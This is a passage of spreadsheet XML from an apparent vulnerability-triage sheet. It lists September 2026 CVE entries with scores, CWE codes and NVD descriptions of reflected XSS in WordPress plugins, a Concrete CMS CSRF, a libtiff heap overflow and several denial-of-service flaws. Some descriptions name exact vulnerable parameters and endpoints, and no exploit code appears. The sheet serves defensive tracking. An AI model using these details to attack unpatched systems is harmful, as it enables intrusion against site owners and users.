          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr"/>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>A prior update that raised a bundled HTTP client library to a version remediating known vulnerabilities was later reverted, reintroducing the earlier, vulnerable version into a log-processing component. The only code path in that component using the library issues a request to a single fixed, trusted vendor URL at initialization and does not process attacker-controlled input through the library, limiting practical exploitability of the reintroduced version in this context.</t>
        </is>
      </c>
      <c r="S667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90455</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90461</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr"/>
      <c r="Q668" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>OpenStack Ironic through 38.0.0 may send a username and password to an unexpected remote host when Image Service is configured for HTTP(S) Basic Authentication.</t>
        </is>
      </c>
      <c r="S668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90461</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48496</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr"/>
      <c r="Q669" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry eBPF Profiler is a production-scale agent for profiling applications across multiple programming languages. Starting in version 0.0.202527 and prior to version 0.0.202622, an unprivileged process can cause the profiler to open a nonregular mapping file, such as a FIFO, and block indefinitely, preventing further ELF analysis and causing a denial of service. Version 0.0.202622 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48496</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89329</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr"/>
      <c r="Q670" s="5" t="inlineStr">
        <is>
          <t>CWE-1322</t>
        </is>
      </c>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in `multipathd`. A local attacker with access to the `multipathd` UNIX control socket can exploit this vulnerability by sending valid commands and then ceasing to read replies. This action can cause the `multipathd` listener thread to block, leading to a Denial of Service (DoS) where legitimate Inter-Process Communication (IPC) operations may hang or time out. This issue does not result in privilege escalation, arbitrary code execution, or impact data confidentiality or integrity.</t>
        </is>
      </c>
      <c r="S670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89329</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18495</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr"/>
      <c r="Q671" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libtiff. A heap-buffer overflow vulnerability exists in the `tiff2pdf` utility due to an integer truncation error when processing crafted BigTIFF files. An attacker can provide a specially crafted BigTIFF file, causing a 64-bit `StripByteCounts` value to be truncated to a 32-bit integer. This leads to an undersized memory allocation and a subsequent out-of-bounds memory copy, resulting in a crash and severe memory corruption.</t>
        </is>
      </c>
      <c r="S671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18495</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18562</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr"/>
      <c r="Q672" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via SEO-friendly permalink filter URL segments in versions up to, and including, 1.4.3. This is due to insufficient input sanitization and output escaping in the wp_load_js() function, which reads filter values from the URL path via the url_request extension's parse_url_query() and embeds them into an inline JavaScript string using json_encode() without escaping single quotes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="S672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18562</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18964</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr"/>
      <c r="Q673" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>The Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. WordPress's server-side HTML encoding of the 's' search parameter in the &amp;lt;title&amp;gt; element is bypassed because the browser DOM API decodes HTML entities when jQuery's .text() method reads document.title, returning literal special characters that are then embedded unescaped into the constructed HTML attribute value.</t>
        </is>
      </c>
      <c r="S673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18964</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19797</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr"/>
      <c r="Q674" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>The User Access Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab_group_section' parameter in all versions up to, and including, 2.3.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="S674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19797</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19985</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr"/>
      <c r="Q675" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>The Relevanssi – A Better Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.28.1 via the 's', 'post_types', and 'orderby' request parameters. This is due to insufficient input sanitization and output escaping in the relevanssi_debug_array() function in lib/debug.php, which dumps user-supplied query variables through print_r() inside a &lt;pre&gt; block without HTML escaping. The debug path is enabled by supplying the relevanssi_debug=on request parameter when the administrator has previously enabled the 'Debugging mode' setting; the gate itself is a configuration check with no capability, nonce, or logged-in check (the vendor explicitly suppresses nonce verification on that line). This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="S675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19985</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7298</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr"/>
      <c r="Q676" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in IdeaSoft Software Industry and Trade Inc. Smart E-Commerce allows Reflected XSS.
This issue affects Smart E-Commerce: through 11092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="S676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7298</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77150</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr"/>
      <c r="Q677" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'data[name]' Parameter in all versions up to, and including, 2.0.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The show_preview AJAX action is registered for unauthenticated users and is gated only by a nonce, which an unauthenticated attacker can retrieve by loading any publicly accessible page that emits it.</t>
        </is>
      </c>
      <c r="S677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77150</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77490</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr"/>
      <c r="Q678" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77490</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78172</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr"/>
      <c r="Q679" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>The Themify – WooCommerce Product Filter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via Query Parameter Name in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="S679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78172</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79035</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr"/>
      <c r="Q680" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the p.rfihub.com component of Zeta Marketing Platform (ZMP) v1.0 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted URL into the ca parameter.</t>
        </is>
      </c>
      <c r="S680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79035</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81907</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr"/>
      <c r="Q681" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9.5.2 and below is vulnerable to Cross-Site Request Forgery (CSRF) in the Express "Clear Entries" function (POST /index.php/dashboard/system/express/entities/delete_entries) because the controller records but does not enforce a failed CSRF token check, allowing the destructive operation to proceed when the token is missing or invalid. A remote unauthenticated attacker can force an authenticated administrator who visits an attacker-controlled page to permanently delete all entries belonging to an attacker-selected Express entity on a web application to which the administrator is currently authenticated. Because the default Contact Express object ships with a fixed entity UUID, the target identifier can be obtained without dashboard access. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Pratik Zanjurne for reporting.</t>
        </is>
      </c>
      <c r="S681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81907</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84960</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr"/>
      <c r="Q682" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL Query String in all versions up to, and including, 3.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Successful exploitation requires the victim to first visit the attacker-crafted URL and then click the Terms of Service link rendered on the resulting registration page.</t>
        </is>
      </c>
      <c r="S682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84960</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18061</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr">
        <is>
          <t>amazon:advanced_jdbc_wrapper</t>
        </is>
      </c>
      <c r="L683" s="5" t="inlineStr"/>
